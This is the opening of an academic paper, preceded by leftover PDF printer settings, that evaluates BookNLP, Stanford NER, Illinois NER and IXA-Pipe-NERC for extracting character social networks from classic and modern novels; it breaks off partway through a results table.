/MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_qzjy63q6cbfzlfevurt7tyno7m ---- Evaluating named entity recognition tools for extracting social networks from novels Evaluating named entity recognition tools for extracting social networks from novels Niels Dekker1, Tobias Kuhn1 and Marieke van Erp2 1 Department of Computer Science, Vrije Universiteit Amsterdam, Amsterdam, The Netherlands 2 DHLab, KNAW Humanities Cluster, Amsterdam, The Netherlands ABSTRACT The analysis of literary works has experienced a surge in computer-assisted processing. To obtain insights into the community structures and social interactions portrayed in novels, the creation of social networks from novels has gained popularity. Many methods rely on identifying named entities and relations for the construction of these networks, but many of these tools are not specifically created for the literary domain. Furthermore, many of the studies on information extraction from literature typically focus on 19th and early 20th century source material. Because of this, it is unclear if these techniques are as suitable to modern-day literature as they are to those older novels. We present a study in which we evaluate natural language processing tools for the automatic extraction of social networks from novels as well as their network structure. We find that there are no significant differences between old and modern novels but that both are subject to a large amount of variance. Furthermore, we identify several issues that complicate named entity recognition in our set of novels and we present methods to remedy these. We see this work as a step in creating more culturally-aware AI systems. Subjects Computational Linguistics, Digital Libraries, Network Science and Online Social Networks Keywords Social networks, Named entity recognition, Evaluation, Digital humanities, Classic and modern literature, Cultural AI INTRODUCTION The characters and their relations can be seen as the backbone of any story, and explicitly creating and analysing a network from these relationships can provide insights into the community structures and social interactions portrayed in novels (Moretti, 2013). Quantitative approaches to social network analysis to examine the overall structure of these social ties, are borrowed from modern sociology and have found their way into many other research fields such as computer science, history, and literary studies (Scott, 2012). Elson, Dames & McKeown (2010), Lee & Yeung (2012), Agarwal, Kotalwar & Rambow (2013), and Ardanuy & Sporleder (2014) have all proposed methods for automatic social network extraction from literary sources. The most commonly used approach for extracting such networks, is to first identify characters in the novel through Named Entity Recognition (NER) and then identifying relationships between the characters through for example measuring how often two or more characters are mentioned in the same sentence or paragraph. Many studies use off-the-shelf named entity recognisers, which are not necessarily optimised for the literary domain and do not take into account the surrounding cultural How to cite this article Dekker N, Kuhn T, van Erp M. 2019. Evaluating named entity recognition tools for extracting social networks from novels. PeerJ Comput. Sci. 5:e189 DOI 10.7717/peerj-cs.189 Submitted 2 October 2018 Accepted 1 April 2019 Published 18 April 2019 Corresponding author Marieke van Erp, marieke.van.erp@dh.huc.knaw.nl Academic editor Diego Amancio Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.189 Copyright 2019 Dekker et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.189 mailto:marieke.�van.�erp@�dh.�huc.�knaw.�nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.189 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ context. Furthermore, to the best of our knowledge, such studies focus on social network extraction from 19th and early 20th century novels (which we refer to as classic novels).1 Typically, these classic novels are obtained from Project Gutenberg (http://gutenberg.org/), where such public domain books are available for free. While beneficial for the accessibility and reproducibility of the studies in question, more recent novels may not imitate these classic novels with respect to structure or style. It is therefore possible that classic novels have social networks that have a structure that is very different from more recent literature. They might differ, for example, in their overall number of characters, in the typical number of social ties any given character has, in the presence or absence of densely connected clusters, or in how closely connected any two characters are on average. Moreover, changes along dimensions such as writing style, vocabulary, and sentence length could prove to be either beneficial or detrimental to the performance of natural language processing techniques. This may lead to different results even if the actual network structures remained the same. Vala et al. (2015) did compare 18th and 19th century novels on the number of characters that appear in the story, but found no significant difference between the two. Furthermore, an exploration of extracted networks can also be used to assess the quality of the extracted information and investigate the structure of the expression of social ties in a novel. Thus far, we have not found any studies that explore how NER tools perform on a diverse corpus of fiction literature. In this study, we evaluate four different tools on a set of classic novels which have been used for network extraction and analyses in prior work, as well as more recent fiction literature (henceforth referred to as modern novels). We need such an evaluation to assess the robustness of these tools to variation in language over time (Biber & Finegan, 1989) and across literary genres. Comparing social networks extracted from corpora consisting of classic and modern novels may give us some insights into what characteristics of literary text may aid or hinder automatic social network extraction and provide indications of cultural change. As previous work (Ardanuy & Sporleder, 2014) has included works from different genres, in this work we decided to focus on the fantasy/science fiction domain to smooth potential genre differences in our modern books. In our evaluation, we devote extra attention to the comparison between classic and modern fantasy/science fiction in our corpus. We define the following research questions: � To what extent are off-the-shelf NER tools suitable for identifying fictional characters in novels? � Which differences or similarities can be discovered between social networks extracted for different novels? To answer our first research question, we first evaluate four named entity recognisers on 20 classic and 20 modern fantasy/science fiction novels. In each of these novels, the first chapter is manually annotated with named entities and coreference relations. The named entity recognisers we evaluate are: (1) BookNLP (Bamman, Underwood & Smith, 2014; 1 We follow (Sainte-Beuve, 1910) here in defining a classic novel not as one written by the ancient Greeks or Romans (‘the classics’) but to canonical works. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 2/29 http://gutenberg.org/ http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ https://github.com/dbamman/book-nlp—commit: 81d7a31) which is specifically tailored to identify and cluster literary characters, and has been used to extract entities from a corpus of 15,099 English novels. At the time of writing, this tool was cited 80 times. (2) Stanford NER version 3.8.0 (Finkel, Grenager & Manning, 2005), one of the most popular named entity recognisers in the NLP research community, cited 2,648 times at the time of writing. (3) Illinois Named Entity Tagger version 3.0.23 (Ratinov & Roth, 2009), a computationally efficient tagger that uses a combination of machine learning, gazetteers,2 and additional features extracted from unlabelled data. At the time of writing, the system was downloaded over 10,000 times. Our last system (4) is IXA-Pipe-NERC version 1.1.1 (Agerri & Rigau, 2016), a competitive classifier that employs unlabelled data via clustering and gazetteers that outperformed other state-of-the-art NER tools on their within and out-domain evaluations. To answer the second research question, we use the recognised named entities to create a co-occurrence network for each novel. Network analysis measures are then employed to compare the extracted networks from the classic and modern novels to investigate whether the networks from the different sets of novels exhibit major differences. The contributions of this paper are: (1) a comparison and an analysis of four NER on 20 classic and 20 modern novels; (2) a comparison and an analysis of social network analysis measures on networks automatically extracted from 20 classic and 20 modern novels; (3) experiments and recommendations for boosting performance on recognising entities in novels; and (4) an annotated gold standard dataset with entities and coreferences of 20 classic and 20 modern novels. The remainder of this paper is organised as follows. We first discuss related work in the section ‘Related Work’. Next, we describe our approach and methods in the section ‘Materials and Data Preparation’. We present our evaluation of four different NER systems on 20 classic and 20 modern novels in the section ‘Named Entity Recognition Experiments and Results’, followed by the creation and analysis of social networks in the section ‘Network Analysis’. We discuss issues that we encountered in the identification of fictional characters and showcase some methods to boost performance in the section ‘Discussion and Performance Boosting Options’. We conclude by suggesting directions for future work in the section ‘Conclusion and Future Work’. The code for all experiments as well as annotated data can be found at https://github.com/Niels-Dekker/Out-with-the-Old-and-in-with-the-Novel. RELATED WORK As mentioned in the section ‘Introduction’, we have not found any other studies that compared the performances of social network extraction on classic and modern novels; or compared the structures of these networks. This section therefore focuses on the techniques used on classic literature. In first part of this section, we will describe how other studies extract and cluster characters. In the second part, we outline what different choices can be made for the creation of a network, and motivate our choices for this study. 2 A gazetteer is a list of names Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 3/29 https://github.com/dbamman/book-nlp https://github.com/Niels-Dekker/Out-with-the-Old-and-in-with-the-Novel http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Named entity recognition The first and foremost challenge in creating a social network of literary characters is identifying the characters. NER is often used to identify passages in text that identify things by a name. Furthermore, identified passages are often also classified into various categories such as person, location, and organisation. Typically, this approach is also used to identify miscellaneous numerical mentions such as dates, times, monetary values, and percentages. Elson, Dames & McKeown (2010), Ardanuy & Sporleder (2014), Bamman, Underwood & Smith (2014), and Vala et al. (2015) all use the Stanford NER tagger (Finkel, Grenager & Manning, 2005) to identify characters in literary fiction. On a collection of Sherlock Holmes novels, these studies perform Named entity recognition, F1-scores between: 45 and 54. Vala et al. (2015) propose that the main difficulty with this collection is the multitude of minor characters, a problem which we expect to be also present in our collections of classic and modern novels. A big difference between the news domain (for which most language technology tools have been created) and the literary domain, is that names do not have to follow the same ‘rules’ as names in the real world. This topic is explored in the Namescape project by De Does et al. (2017) namescape (http://blog.namescape.nl/). In this project, one million tokens taken from 550 Dutch novels were manually annotated. A distinction between first and last names was made in order to test whether different name parts are used with different effects. A named entity recogniser was trained specifically for this corpus by namescape-clin, obtaining an F1 score of 93.60 for persons. The corpus contains fragments of novels written between the 17th and 20th century, but as the corpus and tools are not available, we cannot investigate its depth or compare it directly to our work. Other approaches attempt to use the identification of locations and physical proximity to improve the creation of a social network (Lee & Yeung, 2012). Coreference resolution One difficulty of character detection is the variety of aliases one character might go by, or; coreference resolution. For example, George Martin’s Tyrion Lannister, might alternatively be mentioned as Ser Tyrion Lannister, Lord Tyrion, Tyrion, The Imp or The Halfman. In the vast majority of cases, it is desirable to collapse those character references into one character entity. However, in some cases, retaining some distinction between character references can be useful: we provide an example of this in subsection ‘Network Exploration’. Two distinct approaches attempt to address this difficulty, (1) omit parts of a multi- word name, or (2) compile a list of aliases. The former approach leaves out honorifics such as the Ser and Lord in the above example in order to cluster the names of one character. To automate this clustering step, some work has been done by Bamman, Underwood & Smith (2014) and Ardanuy & Sporleder (2014). While useful, the former approach alone provides no solace for the matching of the last two example aliases; where no part of the character’s name is present. The latter approach thus suggests to manually compile a list of aliases for each character with the aid of external resources or annotators. This method is utilised by Elson, Dames & McKeown (2010) and Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 4/29 http://blog.namescape.nl/ http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Lee & Yeung (2012). In namescape-clin, wikification (i.e. attempting to match recognised names to Wikipedia resources) is used. Obviously this is most useful for characters that are famous enough to have a Wikipedia page. The authors state in their error analysis Van Dalen-Oskam et al. (2014, Section 3.2) that titles that are most likely from the fantasy domain are most difficult to resolve, which already hints at some differences between names in different genres. Anaphora resolution To identify as many character references as possible, it is important to take into account that not all references to a character actually mention the character’s name. In fact, Bamman, Underwood & Smith (2014) show that 74% of character references come in the form of a pronouns such as he, him, his, she, her, and hers in a collection of 15,099 English novels. To capture these references, the anaphoric pronoun is typically matched to its antecedent by using the linear word distance between the two, and by matching the gender of anaphora to that of the antecedent. The linear word distance can be, for example, the number of words between the pronoun and the nearest characters. For unusual names, as often found in science fiction and fantasy, identification of the gender may be problematic. Network creation For a social network of literary characters, characters are represented by the nodes, whereas the edges indicate to some interaction or relationship. While the definition of a character is uniformly accepted in the literature, the definition of an interaction varies per approach. In previous research, two main approaches can be identified to define such an edge. On the one hand, conversational networks are used in approaches by Chambers & Jurafsky (2008), Elson & McKeown (2010), and He, Barbosa & Kondrak (2013). This approach focuses on the identification of speakers and listeners, and connecting each speaker and listener to the quoted piece of dialogue they utter or receive. On the other hand, co-occurrence networks (as used by Ardanuy & Sporleder (2014) and Fernandez, Peterson & Ulmer (2015)) are created by connecting characters if they occur in the same body of text. While conversational networks can provide a good view of who speaks directly to whom, Ardanuy & Sporleder (2014) argue that ‘...much of the interaction in novels is done off-dialogue through the description of the narrator or indirect interactions’ (p. 34). What value to assign to the edges depends on the end-goal of the study. For example, Fernandez, Peterson & Ulmer (2015) assign a negative or positive sentiment score to the edges between each character-pair in order to ultimately predict the protagonist and antagonist of the text. Ardanuy & Sporleder (2014) used weighted edges to indicate how often two characters interact. Network analysis Social network analysis draws upon network theory for its network analysis measures (Scott, 2012). The application of these measures to networks extracted from literature has been demonstrated insightful in assessing the relationships of characters in for example Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 5/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ ‘Alice in Wonderland’ (Agarwal et al., 2012) and ‘Beowulf’, the ‘Iliad’ and ‘Táin Bó Cuailnge’ (‘The Cattle Raid of Cooley’, an Irish epic) (Mac Carron & Kenna, 2012). Network analysis can also play a role in authorship attribution (Amancio, 2015, Akimushkin, Amancio & Oliveira, 2017) and characterising a novel (Elson, Dames & McKeown, 2010). MATERIALS AND DATA PREPARATION For the study presented here, we are interested in the recognition and identification of persons mentioned in classic and modern novels for the construction of the social network of these fictitious characters. We use off-the-shelf state-of-the-art entity recognition tools in an automatic pipeline without manually created alias lists or similar techniques. For the network construction, we follow Ardanuy & Sporleder (2014) and apply their co-occurrence approach for the generation of the social network links with weighted edges that indicate how often two characters are mentioned together. We leave the consideration of negative weights and sentiments for future work. Before we will explain the details of the used entity recognition tools, how they compare for the given task, and how their results can be used to build and analyse the respective social networks, we explain first the details of our selected corpus, how we preprocessed the data, and how we collected the annotations for the evaluation. Corpus selection Our dataset consists of 40 novels—20 classic and 20 modern novels—the specifics of which are presented in Table A2 in the Appendix. Any selection of sources is bound to be unrepresentative in terms of some characteristics but we have attempted to balance breadth and depth in our dataset. Furthermore, we have based ourselves on selections made by other researchers for the classics and compilations by others for the modern books. For the classic set, the selection was based on Guardian’s Top 100 all-time classic novels (McCrum, 2003). Wherever possible, we selected books that were (1) analysed in related work (as mentioned in the subsection ‘Coreference Resolution’) and (2) available through Project Gutenberg (https://www.gutenberg.org/). For the modern set, the books were selected by reference to a list compiled by BestFantasyBooksCom (http://bestfantasybooks.com/top25-fantasy-books.php, last retrieved: 30 October 2017). For our final selection of these novels, we deliberately made some adjustments to get a wider selection. That is, some of the books in this list are part of a series. If we were to include all the books of the upvoted series, our list would consist of only four different series. We therefore chose to include only the first book of each of such series. As the newer books are unavailable on Gutenberg, these were purchased online. These digital texts are generally provided in .epub or .mobi format. In order to reliably convert these files into plain text format, we used Calibre (https://calibre-ebook.com/—version 2.78), a free and open-source e-book conversion tool. This conversion was mostly without any hurdles, but some issues were encountered in terms of encoding, as is discussed in the next section. Due to copyright restrictions, we cannot share this full dataset but our gold standard Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 6/29 https://www.gutenberg.org/ http://bestfantasybooks.com/top25-fantasy-books.php https://calibre-ebook.com/ http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ annotations of the first chapter of each are provided on this project’s GitHub page. The ISBN numbers of the editions used in our study can be found in Table A2 the Appendix. Data preprocessing To ensure that all the harvested text files were ready for processing, we firstly ensured that the encoding for all the documents was the same, in order to avoid issues down the line. In addition, all information that is not directly relevant to the story of the novel was stripped. Even while peripheral information in some books—such as appendices or glossaries—can provide useful information about character relationships, we decided to focus on the story content and thus discard this information. Where applicable, the following peripheral information was manually removed: (1) reviews by fellow writers, (2) dedications or acknowledgements, (3) publishing information, (4) table of contents, (5) chapter headings and page numbers, and (6) appendices and/or glossaries. During this clean-up phase, we encountered some encoding issues that came with the conversion to plain text files. Especially in the modern novels, some novels used inconsistent or odd quotation marks. This issue was addressed by replacing the inconsistent quotation marks with neutral quotations that are identical in form, regardless of whether if it is used as opening or closing quotation mark. Annotation Because of limitations in time and scope, we only annotated approximately one chapter of each novel. In this subsection, we describe the annotation process. Annotation data To evaluate the performance for each novel, a gold standard was created manually. Two annotators (not the authors of this article) were asked to evaluate 10 books from each category. For each document, approximately one chapter was annotated with entity co-occurrences. Because the length of the first chapter fluctuated between 84 and 1,442 sentences, we selected an average of 300 sentences for each book that was close to a chapter-boundary. For example, for Alice in Wonderland, the third chapter ended on the 315th sentence, so the first three chapters were extracted for annotation. While not perfect, we attempted to strike a balance between comparable annotation lengths for each book, without cutting off mid-chapter. Annotation instructions For each document, the annotators were asked to annotate each sentence for the occurrence of characters. That is, for each sentence, identify all the characters in it. To describe this process, an example containing a single sentence from A Game of Thrones is included in Table 1. The id of the sentence is later used to match the annotated sentence to Table 1 Annotation example. Id Preceding context Focus sentence Subsequent context # Person 1 Person 2 541 Bran reached out hesitantly ‘Go on’, Robb told him ‘You can touch him’ 2 Robb Stark Bran Stark Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 7/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ its system-generated counterpart for performance evaluation. The focus sentence is the sentence that corresponds to this id, and is the sentence for which the annotator is supposed to identify all characters. As context, the annotators are provided with the preceding and subsequent sentences. In this example, the contextual sentences could be used to resolve the ‘him’ in the focus sentence to ‘Bran’. To indicate how many persons are present, the annotators were asked to fill in the corresponding number (#) of people—with a maximum of 10 characters per sentence. Depending on this number of people identified, subsequent fields became available to the annotator to fill in the character names. To speed up the annotation, an initial list of characters was created by applying the BookNLP pipeline to each novel. The annotators were instructed to map the characters in the text to the provided list to the best of their ability. If the annotator assessed that a person appears in a sentence, but is unsure of this character’s identity, the annotators would mark this character as default. In addition, the annotators were encouraged to add characters, should they be certain that this character does not appear in the pre-compiled list, but occurs in the text nonetheless. Such characters were given a specific tag to ensure that we could retrieve them later for analysis. Lastly, if the annotator is under the impression that two characters in the list refer to the same person, the annotators were instructed to pick one and stick to that. Lastly, the annotators were provided with the peripheral annotation instructions found in Table 2. While this identification process did include anaphora resolution of singular pronouns— such as resolving ‘him’ to ‘Bran’—the annotators were instructed to ignore plural pronoun references. Plural pronoun resolution remains a difficult topic in the creation of social networks, as family members may sometimes be mentioned individually, and sometimes their family as a whole. Identifying group membership, and modelling that in the social network structure is not covered by any of the tools we include in our analysis or the related work referenced in the section ‘Related Work’ and therefore left to future work. NAMED ENTITY RECOGNITION EXPERIMENTS AND RESULTS We evaluate the performance of four different NER systems on the annotated novels: BookNLP (Bamman, Underwood & Smith, 2014), Stanford NER (Finkel, Grenager & Manning, 2005), Illinois Tagger (Ratinov & Roth, 2009), and IXA-Pipe-NERC (Agerri & Rigau, 2016). The BookNLP pipeline uses the 2014-01-04 release of Stanford NER tagger (Finkel, Grenager & Manning, 2005) internally with the seven-class ontonotes model. Table 2 Annotation instructions. Guideline Example Ignore generic pronouns ‘Everyone knows; you don’t mess with me!’ Ignore exclamations ‘For Christ’s sake!’ Ignore generic noun phrases ‘Bilbo didn’t know what to tell the wizard’ Include non-human named characters ‘His name is Buckbeak, he’s a hippogriph’ Note: Boldface indicates an entity mention. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 8/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ As there have been several releases, and we focus on entities of type Person, we also evaluate the 2017-06-09 Stanford NER four-class CoNLL model. The results of the different NER systems are presented in Table 3 for the classic novels, and Table 4 for the modern novels. All results are computed using the evaluation script used in the CoNLL 2002 and 2003 NER campaigns using the phrase-based evaluation setup (https://www.clips.uantwerpen.be/conll2002/ner/bin/conlleval.txt, last retrieved: 30 October 2017). The systems are evaluated according to micro-averaged precision, recall and F1 measure. Precision is the percentage of named entities found by the system that were correct. Recall is the percentage of named entities present in the text that are retrieved by the system. The F1 measure is the harmonic mean of the precision and recall scores. In a phrase-based evaluation setup, the system only scores a point if the complete entity is correctly identified, thus if in a named entity consisting of multiple tokens only two out of three tokens are correctly identified, the system does not obtain any points. The BookNLP and IXA-Pipe-NERC systems require that part of speech tagging is performed prior to NER, we use the modules included in the respective systems Table 3 Precision (P), Recall (R), and F1-scores of different NER systems on classic novels. Title BookNLP Stanford NER Illinois NER IXA-NERC P R F1 P R F1 P R F1 P R F1 1984 92.31 70.59 80.00 89.29 73.53 80.65 93.55 85.29 89.23 93.55 85.29 89.23 A Study in Scarlet⊙ 25.00 30.77 27.59 22.22 30.77 25.81 14.29 15.38 14.81 20.00 23.08 21.43 Alice in Wonderland 